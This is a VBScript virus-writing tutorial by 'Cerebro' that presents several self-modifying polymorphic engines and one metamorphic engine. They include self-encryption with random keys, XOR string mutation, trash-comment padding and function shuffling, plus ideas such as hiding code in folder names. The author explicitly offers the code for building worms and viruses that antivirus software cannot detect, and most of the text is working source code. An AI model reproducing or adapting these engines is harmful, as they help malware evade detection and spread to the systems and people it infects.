Contribution - Morphing for Dummies [by Cerebro]
This text isn't gonna teach you to change to a duck or a pigeon..it explains the various
techniques invloved in VBS (Visual Basic Script) for evading AV (Anti Virus)
Disclaimer : The author, Cerebro (thats me..yaa), is in no way responsible for your
actions caused by information provided in this tutorial (as i call it)
i would like to thank the author of 'P1' code for his/her code
plz email me your name/handle so that your name can be credited..
thanx again
Intro :
I have seen tutorials on polymorphism and metamorphism (and oligomorphism..god knows what
that is.....) for languages like ASM
and others like JavaScript but never came across a "VBS Morphing Tutorial"
So i decided to write one..hope it inspires ppl to do more on the subject...
I hope you are not new to VBS coz its gonna be little complex..
Im gonna teach you things that ppl thought was quite impossible..till now!!
There are various tech disccused here that u may have heard of like
o polymorphism - No..no.. not the simple ones..advanced ones
o metamorphism - Ever heard of these cute things..ppl theorize but don't practice
o ideas - Some ppl have them..!!?? u know
(these contain codes that i failed to make bugproof..damn errors)
INDEX
-=-=-
CODE NAME AUTHOR WHAT THEY DO?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
P1 N/A N/A changing variables
P2 RAzzar Cerebro Random case Generation
P3 opo Cerebro vir-body polymorph
P4 TrasH Cerebro adding trash between lines
P5 hitf1 Cerebro special string polymorph
M1 Morpheus 1.2 Cerebro a metamorph
This text includes 5 (yes thats right..5) kinds of polymorph engines
also 1 metmorph engine (Ver 1.2 of Morpheus ME).
Some encryption routines and things that work as they've promised...and some
that don't =(
POLYMORPHISM
==================
(This following text is for beginners if you already know technical stuff you can skip a few stanzas)
Ok! lets start..
For polymorphing you need matter (that means code) and encryption routines capable of handling
multiple keys..
The following encryption routine cannot be used for polymorphism coz it cannot handle multiple keys
infact no keys at all except the body itself
----------------------------------
Function LameCrypt(text)
For i = 1 to len(text)
tt = tt & chr(int(asc(mid(text,i,1))/i))
next
LameCrypt = tt
End Function
----------------------------------
The basic defination of polymorphism Is 'having many forms'...thats not hard..is it?
For eg. imagine a VBS worm (like Anna Kournikova).
It was encrypted and wasn't naked with its code like ILOVEYOU and other couzins of it.
The AV could have easily detected it as a 'New Virus' just by observing its code..But because
of its encryption it slipped thru and caused a little havoc..but after a few hours it was virtually
detectable by every AV...
So what does that teach us..Yeah! ENCRYPTION IS OUR FRIEND, BUT NOT A GOOD ONE..
The Pica worm was detected later because the code was same in every copy of its infections (in comp).
The encryption was worthless coz the same string caused it to be detected..
What we need is a code that encrypts itself (we know to do that) but then use different
encryption keys and routines for every copy of itself..
For eg.
The character 'A' can be 'encrypted' by adding 2 to its ASCII value so the
Enc.code becomes C (65 + 2 = 67 = asc("C")).
to get the original code we just have to substract 2 and yippee we have the org code..
But what if instead of 2 we use 3,4,5,6,9...there are infinite possibilities.
So as long as there is variety our code can be safe from AV's..
Here's the first kind of polymorphing (a beginners code).
This isn't my code so i don't take credit for it..
This code changes its variable names AND FUNCTION NAMES every time it runs...
like
a = 6 becomes safsaf = 6
===========================
Code P1 (THis wasn't my idea nor my code so i don't own it)
===========================
Set FSO=CreateObject("Scripting.FileSystemObject"):Randomize
Set OS=FSO.OpenTextFile(Wscript.ScriptFullName,1,True)
Self=OS.ReadAll:OS.Close
VAR="FSO,OS,Self,S1,VAR,A1,CVAR,VA,B1,"
S1=Split(VAR,Chr(44),-1,1)
For A1=0 to UBound(S1)
Self=Replace(Self,S1(A1),CVAR(S1(A1)),1,-1)
Next
Function CVAR(VA):For B1=1 to Len(VA)
CVAR=CVAR&Chr(Int(Rnd*26)+65):Next:End Function
===========================
END Code P1
===========================
Now that that's over!! Lets move on.
The following code randomly changes the case of the code...(like POP becomes pOp).
NOTE : I've seen this has no effect over AV's.
As they still detect them as before. Yet I've decided to put this so someone can be creative about
the idea..For this tech I include a function that i call 'Random case Generator'
or as i call it RcG
===========================
Code P2 (RAzzar Mutation By Cerebro)
===========================
dIM FSo,sRC,Des
sET fsO = cREAtEOBJeCt("ScriPTInG.FILESYsTEmObJeCT")
SET srb = fSo.oPenTExtfILe(WsCript.scriPTfUllnaMe,1)
FiN = rCG(sRB.ReaDaLL)
sEt FUz = Fso.CreaTeTexTfiLE(WsCRiPT.SCRIPTfULlnaME,TRuE)
FUZ.wRItELINe fIN
FUz.CLoSE
fUnCTION RCG(txt)
FOr I = 1 tO lEn(TXT)
RanDoMIze
bIT = miD(Txt,I,1)
if (INT(Rnd * i) mod 2) = 1 Then
RAm = ucase(Bit)
eLsE
RAm = lCAsE(bit)
End If
RCg = rCG & ram
nEXT
end fUNctIoN
===========================
END Code P2
===========================
There was no encryption involed in the previous codes it was 'mutation' that existed
and in comparision to AV technology it dosen't stand a chance in the wild..But chk
these out!! AV's will have a hard time we just need to optimize this code
and get a new infection routine and poof! We have an undetectable code!!
===========================
Code P3 ('opo' polymorph engine By Cerebro)
===========================
'Cerebro's Poly Engine
enx = "Function enc(zzz)"& vbcrlf &_
"for q = 1 to len(zzz)"& vbcrlf &_
"byt = asc(mid(zzz,q,1))"& vbcrlf &_
"ch = chr(key - byt)"& vbcrlf &_
"if ch = chr(34) then"& vbcrlf &_
"ch = chr(28)"& vbcrlf &_
"end if"& vbcrlf &_
"enc = enc & ch"& vbcrlf &_
"next"& vbcrlf &_
"end function"
execute (enx)
Set fso = CreateObject("Scripting.FileSystemObject")
Randomize
key = int(rnd * 129)+116
if len(UnCrypt) <> 0 then
fin = enc(UnCrypt)
else
Set meb = fso.OpenTextFile(wscript.scriptfullname,1)
bod = meb.readall
fin = enc(bod)
end if
aa = rndwrd(int(rnd * 8)+2)
bb = rndwrd(int(rnd * 7)+3)
cc = rndwrd(int(rnd * 6)+4)
dd = rndwrd(int(rnd * 5)+5)
ee = rndwrd(int(rnd * 6)+4)
ae = rndwrd(int(rnd * 7)+3)
ff = rndwrd(int(rnd * 8)+2)
denx = "Function "&ff&"("& aa &")"& vbcrlf &_
"for "& bb &" = 1 to len("& aa &")"& vbcrlf &_
""& dd &" = asc(mid("& aa &","& bb &",1))"& vbcrlf &_
""& ee &" = chr("& cc &" - "& dd &")"& vbcrlf &_
"if "&ee&" = chr(28) then"& vbcrlf &_
""&ee&" = chr(34)"& vbcrlf &_
"end if"& vbcrlf &_
ff&" = "&ff&" & "& ee &""& vbcrlf &_
"next"& vbcrlf &_
"end function"
Set fuz = fso.CreateTextFile("Wscript.vbs",True)
fuz.Writeline cc&" = "& key
fuz.Writeline ae&"="""& fin &""""
fuz.Writeline "UnCrypt = "&ff&"("&ae&")"
fuz.Writeline "msgbox UnCrypt"
fuz.Writeline "Execute UnCrypt"
fuz.Writeline denx
fuz.close
function rndwrd(l)
for i = 1 to l
Randomize
wrd = wrd & chr(int(rnd * 26)+97)
next
rndwrd = wrd
end function
===========================
END Code P3
===========================
Ok!..So the code is frizzy and quite dirtily coded (any guess who coded the thing..yup it was me!).
There are a total of 129 different encryption keys possible so its quite random..but still it isn't
enough to protect your innocent worm/virus from prying AV's.
So we have to code a better code..
----------------------------------------------------------------------------------------------------
Quote : There is always a better and a worse code ....
----------------------------------------------------------------------------------------------------
This code was adapted from the idea of the worm VBS.NewLove.
It isn't the same code I reconstructed it using compact coding.
Lets see..this code does'nt give a cows ass what its code displays
it merely increases its filesize by adding trash to its own matter
(between lines remark statements..).
Believe it or not it actually worx..in evading AV's (some of them anyways).
===========================
Code P4 (Trash By Cerebro)
===========================
On Error Resume Next
Function Wrd(no)
for i = 1 to int(rnd * 66)+no
Randomize
wrd = wrd & chr(int(rnd * 26)+65)
next
end function
Set FSO= Createobject("scripting.filesystemobject")
Set sef=FSO.OpenTextFile(WScript.ScriptFullname,1)
bod = sef.readall
line = split(bod,vbcrlf)
for n = 1 to ubound(line)
if not(len(line(n))) = 0 then
if not(mid(line(n),1,1)) = "'" then
a = ""
for s = 1 to int(Rnd*10)
a = a & vbcrlf &"'"& wrd(int(Rnd*10)+2)
next
Script=Script & a& vbcrlf & Line(n)
end if
end if
next
Set rep=FSO.CreateTextFile(Wscript.ScriptFullname,true)
rep.write Script
rep.close
===========================
END Code P4
===========================
That was fun!! See that the code mutates itself with trash increasing its size.
One can easily configure it to do more..and the interesting thing is, just by adding
some more lines one can increase the filesize up to 800 Kb..yeah! Its true..u heard it
first on the Cerebro's show.
After a hectic day at the trash polymorphism i give you a doze of...
well more morphing. This time its
STRING POLYMORPHISM
You must have seen viruses/worms having codes like..
------------------------------------------------------------
Set fso = CreateObject(x("353293259853535436657747547543"))
------------------------------------------------------------
where 'x' would be function and would decrypt the parameters.
Its quite a good way to evade AV ppl =)
I was pondering over a method for polymorphism by this method and then thought
of a variation...
In the following code only the strings gets polymorphed..
as I calculated my codes extent of polymorphism it turns out that it was
very efficient..the more strings you bring up..the more polymorphic it
becomes...
===========================
Code P5 (hitf1 By Cerebro)
===========================
dim fun,fso
fun = "cjctz"
a = cjctz("ûäû",139)
b = cjctz("ßÜÉÉÉÉÎÉÜÎÉÎÜÉÀß",175)
c = cjctz("áóôûóáôûðóô",146)
newm = hitf1
newm = replace(newm,fun,rndwrd(5))
Set rep = fso.createtextfile("pop.vbs",1)
rep.writeline newm
rep.close
Function cjctz(txt,key)
for i = 1 to len(txt)
qwe = qwe & chr(asc(mid(txt,i,1)) Xor key)
next
cjctz = qwe
end function
function hitf1()
hah = fun & "(" & chr(34)
set fso = CreateObject(cjctz("•¥´¯¶²¯¨¡è€¯ª£•¿µ²£«‰¤¬£¥²",198))
Set myself = fso.Opentextfile(wscript.ScriptFullname,1)
body = myself.readall
lines = split(body,vbcrlf)
for each line in lines
w = instr(line,hah)
if w > 0 then
x = instr(w,line,")")
hash = mid(line,w,x-w+1)
execute("dec = " & hash)
randomize
r = int(rnd *132)+123
enc = fun & chr(40) & chr(34) & cjctz(dec,r)& chr(34) &","& r &")"
o = replace(body,hash,enc)
body = o
end if
next
hitf1 = body
end function
function rndwrd(l)
for i = 1 to l
wrd = wrd & chr(int(rnd * 26)+97)
next
rndwrd = wrd
end function
===========================
END Code P5
===========================
I call this the 'hitf1' engine.
Stop that applause!!
So now its time to kick more AV ass..I see ppl are beginning to like me more..
Okay..it's the first VBS metamorph that I've seen so far..and it was coded by
ME! (no not WinME Engineers)
===========================
Code M1 (Morpheus ver - 1.2 By Cerebro)
===========================
const nooffunc = 5
dim ch(5),sig(2)
Morpheus()
Function Morpheus()
randomize
set fso = CreateObject("Scripting.FilesystemObject")
Set self = fso.opentextfile(wscript.Scriptfullname,1)
body = self.readall
sig(1) = chr(102) & chr(117) & chr(110) & chr(99) & chr(116) & chr(105) & chr(111) & chr(110)
sig(0) = chr(101) & chr(110) & chr(100) & chr(32) & sig(1)
Set piss = fso.createtextfile(wscript.Scriptfullname,1)
newm = morph(body)
for k = 0 to ubound(ch)
bod = bod & ch(k) & vbcrlf & vbcrlf & vbcrlf
next
numfunc = cnter(bod)+1
piss.writeline "const nooffunc = "& numfunc & vbcrlf
piss.writeline "dim ch("& numfunc &"),sig(2)"& vbcrlf
piss.writeline "Morpheus()"
do
randomize
hh = int(rnd * (newm+1))
aa = instr(mutant,ch(hh))
if aa = 0 then
mutant = mutant & ch(hh) & vbcrlf & vbcrlf & vbcrlf
n = n +1
end if
if n = newm+1 then
exit do
end if
loop
piss.writeline mutant
piss.close
end function
Function Mutator()
text = sig(1) & " "
for i = 1 to int(rnd * 11)+4
randomize
text = text & chr(int(rnd * 26)+97)
next
if len(text) = 9 then text = text & chr((day(now) mod 26)+65) & chr((year(now) mod 26)+65)
text = text & "()"
for i = 1 to int(rnd * 10)+10
randomize
text = text & vbcrlf &"'"
for j =1 to int(rnd * 100)+25
randomize
text = text & chr(int(rnd * 26)+97)
next
next
text = text & vbcrlf & sig(0)
Mutator = text
End function
Function Cnter(txt)
dim w,ind
txt = lcase(txt)
w = 1
ind = 0
while (w <> 0)
w = instr(w+1,txt,sig(1))
ind = ind+1
wend
cnter = (ind/2)
End function
Function Morph(txt)
for j = 0 to (nooffunc-2) 'till exactly the number of fnctions
start = instr(edfun+6,lcase(txt),sig(1))
edfun = instr(edfun+6,lcase(txt),sig(0))
ch(j) = mid(txt,start,edfun-start+len(sig(0)))
next
'add new fake fnctions
if ((day(now)+month(now)) mod 4)=0 then
ch(nooffunc-1) = Mutator
Morph = nooffunc-1
else
ch(nooffunc-1) = ""
Morph = nooffunc-2
end if
End Function
===========================
END Code M1
===========================
READ THIS BEFORE USING ANY OF THE CODE
there are a few backlash to this code
. firstly, it is dependent on the word 'function'
if it finds the word in its code which
does not represent a function (like in REM lines)
then it will destroy its own code
. Secondly, the const nooffunc.
its value must be always 1 more than the
number of functions in the code like the above code
has 4 functions but the value of noofunc is 5 ie (4+1)
. Thirdly, the rest of the code, you have to
confine your original code to functions (like in C++ you can't have freecode)
which means its becomes a sort of a VB code..
By freecode I mean the code that isn't inside a function or sub but
in the main program.
Yes these flaws are threatening the code but it still can be the most
powerfull technique...
if sum of date and month is divisible by 4 then a new function is added
if you want to use this in your code do the following...
1) make your code function integrated (it means all codes in functions)
and able to be executed by 1 function call
2) increase the value of (nooffunc) to "number of function + 1"
3) before the line [piss.writeline "Morpheus()"]
add [piss.writeline "yourfunction()"]
That's it.."oh and also add where you got the metamorph code from"
hey I need credits okay!!
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000
This is the last section of my tutorial..
Every coin has 2 sides....(so what if both are heads)
I'm gonna make you aware of the flaws in these codes that may cause the permanent
deformation of itself
P1 = Though it is theorectically good in structure..
the problem lies in its ignorance for value of its code.
Lets suppose the random variable conflicts a existing function or any other
like for eg
-------------------------------
set lo = CreateObject(".....")
--------------------------------
If you remember right there was a ".close" line in the code.
Let the new variable generated be 'xyz',
now the lines become
-------------------------------
set xyz = CreateObject(".....")
....
....
....
someshit.writeline newcode
someshit.cxyzse
--------------------------------
Do you get my point...like 'lo' it can be 'eat' conflicting with CreateObject
P2 = There is no fault in the code coz VBS is not case-sensitive
However it may coz problems when we drop a 'JS' file.
For eg..
Lets suppose I made a virus in VBS that drops JS code that
is injected into htm* files.
There is no point in injecting if the code is like
"iF MaRkEr != "ViRuS" ". It will simply collapse.
I suggest converting it lower case (lcase() function).
P3 = Like Microsoft's 'Explorer.exe' this is very buggy.
If while encryption some characters that are undefined
are written then it gives out an error.
P4 = TrasH, it is beyond our control coz once the filesize increases
it keeps increasing and gradually the code becomes slow
and degrades the code performances and ultimately crashes.
P5 = hitf1, this code has similar flaws that the metamorph has
and it is dependent on the function name.
The " character can cause a problem if it comes up in the
encrypted body.
P6 = There is'nt one!!
M1 = I've already discussed them..
.:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.
Time for 'broken ideas' this section deals with:
. When AV's Attack
.
_When_AV's_Attack_
(1) A meta-polymorph that encrypts its different functions with different keys
and randomly arranges them in new codes.
(2) A code that uses only a part of its code while executing and store its
rest of the code in variables or REM statements then after execution switches
codes..
(3) math-morph
See this:
Consider:
Addition = A
Substraction = S
Multiplication = M
Division = D
let x be any number in the code
MADS of 'x': Means:
x * x + x / x - x = x
M A D S
There are a lot of such combinations
like this.
ADMS of x: is also x
ASD of x: is ALWAYS = 1 (one)
all you have to do is replace
",1" and "(10)" with strings like "(1 * 1 + 1 / 1 - 1)" alongwith ()
(4) Stealth tech like thingees
_._ Folder Shelter : From the name I assume you are thinking...
"Oh! this guy is gonna tell us about ASCII folders"
Trust me it isn't whack about ASCII folders.
Lets face that Av's are more advanced than us.
But they are always 1 step behind us because when we inovate
they have no idea what we are gonna do.
AV's scan folders but not their names.
What if we create dummy folders that contains
our code?
We create 10 folders for 10 lines of our code,
like:
Folder1 = "Set fso...."
Folder2 = "Virus things"
.......
There are two problems:
Folder names can't have special charaters in them
so we ENCODE the lines using ASCII CODES,
like A is 65.
The SECOND PROBLEM:
How do we know that a folder is a dummy folder?
The virus-extractor should know legitimate folders from viral ones,
so we use a marker like this:
Folder1 = "Marker659498624987614124.."
See, all the extractor has to do is:
1) scan through folders and subfolders (or better yet use a parent folder)
2) if first 6 characters of folder (names) are = "Marker" then read the rest
then decrypt
Then you will see Av's will have no idea what is happening.
_._ Random ExeMorph : I have coded this engine and it was too simple so I decided not
to include the code but the idea, so programmers can code themselves.
The key is to morph random lines in our code like this
for eg:
Msgbox "pop"
becomes
Execute ("chr(x) & chr(y) &......")
You get it don't you, and oh! Yeah AVOID MORPHING lines having strings like
"Next","end","Function","Sub"
_._ JUGGLE : DAMN IDEA does work but is buggy.
Okay! Generate a key that is a number that is less than length of (VirBody).
Juggle pieces of codes like so:
Assume this is hardcore virus.
Virbody = "Infection,Payload,Stealth,Worming"
Generated key is 4.
The juggle: Take 4 characters at a time and reverse them.
virbody = "efnIoitcaP,n........bah! humbug"
You see there are many possibilities and best of all you need only
ONE function to ENCRYPT AND DECRYPT.
Here's a prototype...'n' is the key and 'txt' is the body to be jumbled.
Use it like this:
newbody = Juggle(virbody,key)
================================
Function Juggle(txt,n)
for i = 1 to len(txt) step n
crunch = strreverse(mid(txt,i,n))
jug = jug & crunch
next
juggle = jug
end function
================================
_._ Brute : It is a polymorphic code that bruteforces a key for decryption.
The good thing about this is, there is no need to write a key.
Use a random number and forget about it.
*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&
I am very dissapointed when top virus writers write virii that "EVADE AV's".
I mean a virus should be the Predator and not the prey..
*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&
"There will be a kind.."
"There will be a time.."
"There will be a creed.."
"Till no one sees me.."
Well its that time when we end this tutorial..
If you found any bugs, problems, pimples drop an email.
PS : If you feel you wanna kick my ass or flame me then email addy is root@microsoft.com